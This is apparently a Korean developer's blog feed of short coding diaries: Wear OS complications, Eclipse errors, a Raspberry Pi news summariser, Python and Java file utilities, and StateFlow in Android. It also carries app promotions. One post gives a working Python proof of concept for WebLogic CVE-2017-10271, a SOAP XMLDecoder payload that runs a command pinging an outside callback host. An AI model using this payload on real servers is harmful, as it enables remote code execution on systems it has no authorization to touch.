2026/05/04

오늘의 이야기

wear os



 


🚀 개발일기: Wear OS Complication 클릭 시 앱 실행하기


오늘 Wear OS Complication을 탭했을 때, 내가 만든 워치 앱이 실행되도록 하는 기능을 구현했습니다. 이 기능은 사용자가 워치 페이스에서 바로 앱으로 진입할 수 있게 해주는 중요한 인터랙션입니다.


✨ 핵심 아이디어: `PendingIntent` 사용하기


Complication을 클릭해서 앱을 실행하려면, Complication 데이터에 `PendingIntent`라는 특별한 객체를 연결해야 합니다. 이 `PendingIntent`는 사용자가 Complication을 탭했을 때 시스템이 내 앱의 특정 부분을 대신 실행해 줄 수 있도록 하는 '권한' 같은 것입니다.


🛠️ 코드 수정 방법 (`MainComplicationService.kt`)


Complication 데이터를 생성하는 MainComplicationService.kt 파일의 createComplicationData 함수를 수정해야 합니다.


1. 필요한 `import` 추가


파일 상단에 다음 두 줄을 추가해주세요:



import android.content.Intent
import android.app.PendingIntent
import com.billcorea.habit1007.MainActivity // 당신의 워치 앱 메인 Activity 경로


com.billcorea.habit1007.MainActivity는 당신의 실제 워치 앱의 MainActivity 경로로 변경해야 합니다.


2. `createComplicationData` 함수 수정


createComplicationData 함수 내에서 다음처럼 `Intent`와 `PendingIntent`를 만들고 `tapAction`에 연결합니다.



private fun createComplicationData(text: String, contentDescription: String): ComplicationData {
// 1. Complication을 탭했을 때 실행할 Intent를 만듭니다.
val intent = Intent(this, MainActivity::class.java).apply {
// 앱이 새 태스크(Task)에서 시작되도록 플래그를 추가합니다.
// Complication에서 앱을 시작할 때 일반적으로 권장됩니다.
addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
}

// 2. 이 Intent를 PendingIntent로 감싸서, 워치 페이스가 나중에 실행할 수 있도록 합니다.
// '0'은 요청 코드 (여러 PendingIntent를 만들 때 다르게 지정).
// FLAG_IMMUTABLE은 Android 12(API 31) 이상에서 반드시 필요합니다.
val pendingIntent = PendingIntent.getActivity(
this,
0, // 요청 코드
intent,
PendingIntent.FLAG_IMMUTABLE // Android 12 이상 필수
)

// 3. ComplicationData에 위에서 만든 PendingIntent를 tapAction으로 설정합니다.
return ShortTextComplicationData.Builder(
text = PlainComplicationText.Builder(text).build(),
contentDescription = PlainComplicationText.Builder(contentDescription).build()
)
.setTapAction(pendingIntent) // 여기에 tapAction을 추가합니다!
.build()
}


⚠️ PendingIntent.FLAG_IMMUTABLE은 Android 12 (API 31) 이상을 타겟팅할 경우 필수입니다. 이 플래그를 넣지 않으면 앱이 충돌할 수 있습니다.


✅ 이제 완성입니다!


위 코드 수정 후 앱을 빌드하고 워치에 배포하면, Complication을 탭했을 때 당신의 MainActivity가 실행될 것입니다. 매우 간단하죠?



✨ 요약하자면?


Complication 클릭 시 앱을 실행하려면, MainComplicationService에서 Intent를 사용하여 실행할 Activity를 지정하고, 이를 PendingIntent로 변환한 뒤 ComplicationDatasetTapAction()에 연결하면 됩니다.






오늘의 이야기

eclipse server cannot



 


1️⃣ 글 제목


🧩 Eclipse | jQuery UI 번들 분석과 "Server cannot be resolved" 오류 해결기 ---


2️⃣ 개요 (Intro)


- 오늘의 목표: Eclipse 환경에서 웹 프로젝트 내 `main.bundle.js` 동작 오류 분석 및 Java “Server cannot be resolved” 문제 해결 - 배경: 외부에서 받은 번들 파일을 Eclipse에 올렸을 때, 실행 및 인식 오류 발생 - 사용 기술: Java, Eclipse, jQuery UI, Jetty


📅 날짜: 2025.11.03 🎯 목표: jQuery UI 번들 구조 이해 & Eclipse 실행 오류 해결 🧰 기술: Java, Eclipse, jQuery UI, Jetty, HTML

---


3️⃣ 문제 정의 (Problem / Motivation)


- 웹 프로젝트에서 `main.bundle.js` 파일을 추가했지만 실행이 되지 않음 - Eclipse 콘솔에서 `"Server cannot be resolved to a variable"` 에러 발생 - 원인 파악을 위해 `package.json` 파일과 JS 번들 구조를 분석



// 오류 예시
Server.start();
// ❌ "Server cannot be resolved to a variable"


// package.json 일부
{
"name": "jquery-ui",
"version": "1.13.3",
"license": "MIT",
"dependencies": {
"jquery": ">=1.8.0 <4.0.0"
}
}

---


4️⃣ 해결 과정 (How I Solved It)


1️⃣ `package.json`을 분석해보니, 이 번들은 **jQuery UI (v1.13.3)** 의 빌드 결과물로 확인 2️⃣ `main.bundle.js`는 Grunt로 압축된 **배포용 파일**로, 브라우저에서만 동작 3️⃣ Eclipse에서 바로 실행할 경우 `window` 객체가 없기 때문에 오류 발생 4️⃣ HTML 내 `








오늘의 이야기


#스하리1000명프로젝트,
迷失在韓國?即使您不會說韓語,這個應用程式也可以幫助您輕鬆出行。
只需說出您的語言即可 - 它會翻譯、搜尋並以您的語言顯示結果。
非常適合旅行者!支援英語、日語、中文、越南語等10多種語言。
現在就試試吧!
https://play.google.com/store/apps/details?id=com.billcoreatech.opdgang1127




2026/05/03

오늘의 이야기


#스하리1000명프로젝트,
Đôi khi thật khó để nói chuyện với người lao động nước ngoài phải không?
Tôi đã tạo một ứng dụng đơn giản có ích! Bạn viết bằng ngôn ngữ của bạn và những người khác nhìn thấy nó bằng ngôn ngữ của họ.
Nó tự động dịch dựa trên cài đặt.
Siêu tiện dụng để trò chuyện dễ dàng. Hãy xem khi bạn có cơ hội!
https://play.google.com/store/apps/details?id=com.billcoreatech.multichat416




오늘의 이야기

AI 생성 이미지



 


1️⃣ 글 제목


- 🐍 Python | Raspberry Pi에서 오픈소스 LLM으로 뉴스 요약기 만들기 ---


2️⃣ 개요 (Intro)


- 오늘은 라즈베리 파이에서 오픈소스 LLM을 활용해 웹 뉴스 요약기를 만드는 프로젝트를 구상했다. - 주요 목표는 Daum 포털에서 뉴스 데이터를 수집하고, 경량 LLM을 통해 300자 이내로 요약하는 기능을 구현하는 것. - 사용한 기술 스택은 Python, BeautifulSoup, Hugging Face Transformers, Phi-3 Mini 모델.


📅 날짜: 2025.11.05 🎯 목표: Raspberry Pi에서 뉴스 요약기 구상 🧰 기술: Python, Hugging Face, BeautifulSoup, Phi-3 Mini

---


3️⃣ 문제 정의 (Problem / Motivation)


- 라즈베리 파이처럼 리소스가 제한된 환경에서 LLM을 실행하려면 경량화된 모델이 필요하다. - 웹에서 뉴스 데이터를 자동으로 수집하고, 이를 요약하는 기능을 구현하려면 크롤링과 자연어 처리 기술이 결합되어야 한다. - Daum 포털의 HTML 구조를 분석해 주요 뉴스 텍스트를 추출하는 방식으로 접근했다.



# Daum 뉴스 헤드라인 수집 예시
soup.select("a.link_txt")

---


4️⃣ 해결 과정 (How I Solved It)


- Hugging Face에서 제공하는 Phi-3 Mini 모델을 선택해 Python 코드로 불러오는 방식으로 구성했다. - BeautifulSoup을 활용해 Daum 메인 페이지에서 주요 뉴스 텍스트를 추출하고, 이를 LLM에 입력해 요약 결과를 생성했다. - 전체 흐름은 뉴스 수집 → 요약 요청 → 결과 출력으로 구성되며, 추후 Streamlit을 통해 UI도 확장 가능하다.



# 요약 처리 예시
def summarize_text(text):
prompt = f"다음 내용을 300자 이내로 요약해줘:\n{text}"
inputs = tokenizer(prompt, return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=100)
return tokenizer.decode(outputs[0], skip_special_tokens=True)

---


5️⃣ 결과 (Result)


- 뉴스 헤드라인을 수집하고, LLM을 통해 간결한 요약 결과를 생성하는 데 성공했다. - 라즈베리 파이에서도 실행 가능한 경량 모델을 활용함으로써 저전력 환경에서도 AI 기능을 구현할 수 있다는 가능성을 확인했다.


✅ Daum 뉴스 요약 기능 구현 성공 📉 리소스 사용량 최소화, 실행 속도 안정적

---


6️⃣ 느낀 점 / 회고 (Reflection)


- 오픈소스 LLM의 발전 덕분에 소형 디바이스에서도 자연어 처리 기능을 구현할 수 있다는 점이 인상 깊었다. - 다음에는 Streamlit을 활용해 웹 UI를 추가하고, 요약 결과를 저장하거나 공유할 수 있는 기능을 확장해보고 싶다. - 또한 뉴스 외에도 블로그, 기술 문서 등 다양한 텍스트에 적용해보는 실험도 흥미로울 것 같다. ---


7️⃣ 참고자료 (References)


- [Hugging Face - Phi-3 Mini 모델](https://huggingface.co/microsoft/phi-3-mini) - [BeautifulSoup 공식 문서](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) - [Daum 포털](https://www.daum.net) - [Open Source LLMs in 2025 - GeeksForGeeks](https://www.geeksforgeeks.org/artificial-intelligence/top-10-open-source-llms-in-2025) ---





오늘의 이야기

 


 


🐍 Python | PC에 흩어진 .whl 파일, 한 곳으로 모으는 자동화 스크립트 개발기


AI가 그려준 이미지



 


📅 개요 (Intro)



  • 날짜: 2025.10.26

  • 목표: 여러 프로젝트와 폴더에 흩어져 있는 .whl(휠) 파일들을 하나의 지정된 폴더로 모아주는 Python 스크립트를 개발하여 라이브러리 관리를 효율화한다.

  • 기술: Python, os 모듈, shutil 모듈


🧐 문제 정의 (Problem / Motivation)


Python으로 여러 프로젝트를 진행하다 보니 가상 환경(venv), 다운로드 폴더 등 PC 곳곳에 .whl 파일들이 쌓이기 시작했습니다. 특정 라이브러리의 구버전이 필요하거나 오프라인 환경에서 설치해야 할 때, 이 파일들을 찾아 헤매는 일이 잦아졌습니다.


수동으로 *.whl을 검색해서 일일이 옮기는 것은 너무 번거롭고, 실수로 중요한 파일을 누락할 위험도 있었습니다. 이 반복적인 정리 작업을 자동화할 필요성을 느끼게 되었습니다.


🛠️ 해결 과정 (How I Solved It)


이 문제를 해결하기 위해 Python의 내장 라이브러리만을 사용하여 간단한 스크립트를 작성하기로 했습니다.


1. 파일 시스템 순회 및 .whl 파일 검색


가장 먼저 PC의 특정 드라이브(예: C:\)부터 시작해 모든 하위 폴더를 탐색해야 했습니다. Python의 os 모듈에 포함된 os.walk() 함수가 이 작업에 안성맞춤이었습니다. 이 함수는 지정된 경로의 모든 폴더와 파일을 순회하는 제너레이터(generator)를 반환해 줍니다.


파일을 찾은 후에는 문자열의 .endswith(".whl") 메서드를 이용해 확장자가 .whl인 파일만 골라 리스트에 추가했습니다.


import os

def find_whl_files(start_path):
"""지정된 경로와 그 하위 디렉토리에서 .whl 파일을 찾습니다."""
whl_files = []
for root, dirs, files in os.walk(start_path):
for file in files:
if file.endswith(".whl"):
whl_files.append(os.path.join(root, file))
return whl_files

2. 찾은 파일들을 지정된 폴더로 이동


파일 검색이 완료되면, 이제 이 파일들을 한 곳으로 옮겨야 합니다. 파일 이동, 복사, 삭제 등 파일 시스템 관련 고급 작업을 처리하는 shutil 모듈의 shutil.move() 함수를 사용했습니다.


혹시 모를 오류(권한 문제 등)에 대비해 try-except 구문으로 각 파일 이동 작업을 감싸 안정성을 높였습니다.


import shutil

# 파일을 옮길 목적지 폴더
destination_folder = r'C:\Users\nari4\downloads'

# 목적지 폴더가 없으면 생성
if not os.path.exists(destination_folder):
os.makedirs(destination_folder)

# 찾은 파일 리스트(all_whl_files)를 순회하며 이동
for file_path in all_whl_files:
try:
shutil.move(file_path, destination_folder)
print(f"이동 완료: {file_path}")
except Exception as e:
print(f"'{file_path}' 이동 중 오류 발생: {e}")

✨ 결과 (Result)


스크립트를 실행하자 PC에 흩어져 있던 모든 .whl 파일들이 제가 지정한 C:\Users\nari4\downloads 폴더로 깔끔하게 정리되었습니다.


개선된 점:



  • 이제 필요한 .whl 파일이 있다면 지정된 폴더만 확인하면 되므로 라이브러리 관리가 매우 편해졌습니다.

  • 불필요한 파일을 찾아 헤매거나 중복으로 다운로드하는 시간이 사라졌습니다.

  • 단순 반복 작업을 자동화하여 생산성이 향상되었습니다.


실행 결과 예시:


C:\ 드라이브에서 .whl 파일을 검색합니다...

[찾은 .whl 파일 목록]
C:\projectA\venv\downloads\some_package-1.0-py3-none-any.whl
C:\Users\nari4\Downloads\another_package-2.1-cp39-cp39-win_amd64.whl

[총 2개의 .whl 파일을 'C:\Users\nari4\downloads'로 이동합니다]
이동 완료: C:\projectA\venv\downloads\some_package-1.0-py3-none-any.whl
이동 완료: C:\Users\nari4\Downloads\another_package-2.1-cp39-cp39-win_amd64.whl

파일 이동이 완료되었습니다.

📝 느낀 점 / 회고 (Reflection)



  • 교훈: 역시 "반복적인 작업이 있다면 자동화를 고민하라"는 말이 정답이었습니다. 잠시 시간을 투자해 만든 스크립트 덕분에 앞으로의 개발 환경이 훨씬 쾌적해졌습니다.

  • 기술: os.walk()shutil.move()라는 Python의 기본적이면서도 강력한 도구의 활용법을 다시 한번 되새길 수 있었습니다.

  • 다음 목표: 이 스크립트를 좀 더 발전시켜보고 싶습니다. 예를 들어, 이동 전에 파일명이 중복되는 경우 사용자에게 덮어쓸지 물어보는 옵션을 추가하거나, 오래된 버전의 .whl 파일을 식별하여 따로 분류하는 기능을 구현해 볼 계획입니다.


📚 참고자료 (References)



  • Python os 모듈 공식 문서

  • Python shutil 모듈 공식 문서





오늘의 이야기


#스하리1000명프로젝트,
有时候和外劳说话很难,对吧?
我制作了一个简单的应用程序,可以帮助您!你用你的语言写作,其他人用他们的语言看到它。
它根据设置自动翻译。
超级方便,可以轻松聊天。有机会就来看看吧!
https://play.google.com/store/apps/details?id=com.billcoreatech.multichat416




오늘의 이야기

 



Oracle WebLogic Server CVE-2017-10271 취약점 분석 및 테스트


웹취약점 강조이미지



 



1. 취약점 개요


CVE-2017-10271은 WebLogic의 WSAT 컴포넌트에서 발생한 역직렬화 취약점으로, SOAP 요청을 통해 원격 코드 실행이 가능한 심각한 보안 이슈입니다.



  • 공개일: 2017년 10월

  • CVSS 점수: 7.5 (High)

  • 영향 버전: WebLogic 10.3.6 이하, 12.1.3 이하 등




2. Python으로 취약점 검증하기


외부 코드를 반입하지 않고 SOAP 요청을 직접 구성하여 WebLogic 서버에 테스트할 수 있습니다.


import requests

target_url = "http://<TARGET_IP>:<PORT>/wls-wsat/CoordinatorPortType"

payload = """<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>cmd</string></void>
<void index="1"><string>/c</string></void>
<void index="2"><string>ping yourdomain.ceye.io</string></void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
"""

headers = { "Content-Type": "text/xml" }

response = requests.post(target_url, data=payload, headers=headers)
print("Status Code:", response.status_code)
print("Response:", response.text)


 


 



대응방안도 연구해 봐야할 것 같습니다. 


 





오늘의 이야기


#billcorea #운동동아리관리앱
🏸 Schneedle,羽毛球俱乐部必备应用!
👉 比洞赛 – 记录分数并寻找对手 🎉
适合任何地方,独自一人、与朋友一起或在俱乐部! 🤝
如果你喜欢羽毛球,一定要尝试一下

前往应用程序👉 https://play.google.com/store/apps/details?id=com.billcorea.matchplay




오늘의 이야기

 



Java 로컬 파일 처리, 문자열 검색, 간이 DB 활용 정리


java 활용 이미지



 


1. Java 1.8에서 java.nio.file 사용



  • Files, Path, DirectoryStream 등 모두 사용 가능

  • 파일 탐색, 필터링, 감시 기능까지 구현 가능


예시: .log 파일 필터링


try (Stream<Path> stream = Files.walk(Paths.get("sample"))) {
stream
.filter(Files::isRegularFile)
.filter(p -> p.toString().endsWith(".log"))
.forEach(System.out::println);
}

2. 파일 내용 읽기


private static void readFileContent(Path path) {
List<String> lines = Files.readAllLines(path, StandardCharsets.UTF_8);
for (String line : lines) {
System.out.println(line);
}
}

3. 문자열 검색 및 처리


문자열에 특정 단어 포함 여부 확인


String text = "오늘은 날씨가 좋다";
if (text.contains("날씨")) {
System.out.println("포함됨");
}

문자열 배열에서 특정 단어 포함 여부


String[] keywords = {"error", "fail", "exception"};
String line = "This line contains an exception.";

for (String keyword : keywords) {
if (line.contains(keyword)) {
System.out.println("포함된 키워드: " + keyword);
}
}

원화 기호(₩)로 문자열 분리


String text = "apple₩banana₩cherry";
String[] parts = text.split("₩");

파일 이름에서 확장자 제거


String fileName = path.getFileName().toString();
int dotIndex = fileName.lastIndexOf(".");
String nameWithoutExtension = (dotIndex > 0) ? fileName.substring(0, dotIndex) : fileName;

경로에서 특정 위치의 디렉토리 추출


Path path = Paths.get("/home/kang/documents/report.txt");
System.out.println(path.getName(1)); // "kang"

4. Java에서 사용할 수 있는 로컬 간이 DB






























DB 종류 설명 저장 방식
SQLite 가장 널리 쓰이는 경량 DB .db 파일
H2 Java 전용, 메모리 또는 파일 기반 .mv.db 또는 메모리
Derby Oracle이 만든 Java 내장형 DB 디렉토리 기반
MapDB Java 객체 기반 저장소 .db 파일

5. SQLite 사용법


Connection conn = DriverManager.getConnection("jdbc:sqlite:mydata.db");
Statement stmt = conn.createStatement();
stmt.execute("CREATE TABLE IF NOT EXISTS users (id INTEGER PRIMARY KEY, name TEXT)");
stmt.execute("INSERT INTO users (name) VALUES ('Kang')");
ResultSet rs = stmt.executeQuery("SELECT * FROM users");

필요한 JAR 파일



  • SQLite: sqlite-jdbc-3.43.2.0.jar


6. H2 사용법


Connection conn = DriverManager.getConnection("jdbc:h2:./testdb", "sa", "");
Statement stmt = conn.createStatement();
stmt.execute("CREATE TABLE IF NOT EXISTS users (id INT PRIMARY KEY, name VARCHAR(255))");

필요한 JAR 파일



  • H2: h2-2.2.224.jar (직접 실행하거나 Maven으로 자동 포함 가능)


이 글은 Java로 로컬 파일을 다루고, 문자열을 분석하고, 간단한 데이터베이스를 활용하는 방법을 정리한 내용입니다. 테스트용 앱이나 로그 분석, 간단한 GUI 앱에도 활용할 수 있어요!





오늘의 이야기

viewmodel



 





🧠 Android | ViewModel에서 StateFlow로 상태 관리하기


개요 (Intro)

오늘은 기존에 사용하던 LiveData 대신 StateFlow를 이용해 UI 상태를 더 명확하고 안정적으로 관리하는 방법을 실험해봤습니다.


📅 날짜: 2025.10.30
🎯 목표: ViewModel에서 StateFlow로 UI 상태 관리하기
🧰 기술: Kotlin, Jetpack Compose, Hilt, StateFlow, ViewModel

 




문제 정의 (Problem / Motivation)

앱에서 LiveData를 사용할 때, 다음과 같은 문제가 있었습니다:



  • 화면 회전 시 상태가 재구성되지 않거나 중복 업데이트 발생

  • MutableLiveData의 비동기 처리 시점 불일치

  • Compose 환경에서 Flow 변환을 반복적으로 수행해야 하는 번거로움


이 문제를 해결하기 위해 StateFlow 기반의 단방향 데이터 스트림 (Unidirectional Flow) 패턴을 적용해보기로 했습니다.


@HiltViewModel
class MainViewModel @Inject constructor() : ViewModel() {

private val _uiState = MutableStateFlow("초기 상태")
val uiState: StateFlow<String> = _uiState.asStateFlow()

fun updateMessage(newMessage: String) {
_uiState.value = newMessage
}
}

@Composable
fun MainScreen(viewModel: MainViewModel = hiltViewModel()) {
val message by viewModel.uiState.collectAsState()

Column(
modifier = Modifier.fillMaxSize().padding(16.dp),
verticalArrangement = Arrangement.Center,
horizontalAlignment = Alignment.CenterHorizontally
) {
Text(text = message)
Spacer(modifier = Modifier.height(12.dp))
Button(onClick = { viewModel.updateMessage("StateFlow 업데이트 완료!") }) {
Text("업데이트")
}
}
}



결과 (Result)

✅ ViewModel의 상태가 Compose UI와 실시간으로 안정적으로 동기화됨
🚀 화면 회전, 재구성 시에도 데이터 손실 없이 유지
📱 코드 간결성 증가 및 비동기 처리 예측 가능성 향상



느낀 점 / 회고 (Reflection)


  • LiveData보다 StateFlow가 Compose 환경과 훨씬 궁합이 좋음을 체감했습니다.

  • Flow 기반 전환으로 테스트 코드 작성 및 재구성 관리가 간편해졌습니다.

  • 앞으로는 모든 ViewModel 상태 관리를 StateFlow + UIState sealed class 형태로 전환할 예정입니다.




참고자료 (References)





✅ 요약하자면?


StateFlow는 LiveData보다 예측 가능하고 Compose 친화적입니다.
UI 상태 동기화 문제를 간단히 해결할 수 있으며, 구조적 안정성이 향상됩니다.
다음 단계로는 sealed class UIState 패턴과 결합해볼 예정입니다.


📊 피드백 그래프



























 





오늘의 이야기

#스하리1000명프로젝트 오늘 내가 만든앱 하나 알려주고 싶어, 이 앱은 알림수집기 라고 이름을 붙였는 데, 내 폰에 표시 되는 알림을 읽어서 내가 지정한 단어가 들어 있고, 지출기록을 남겨야 하는 알림이 있으면 수집하고, 카카오톡으로 친구에게...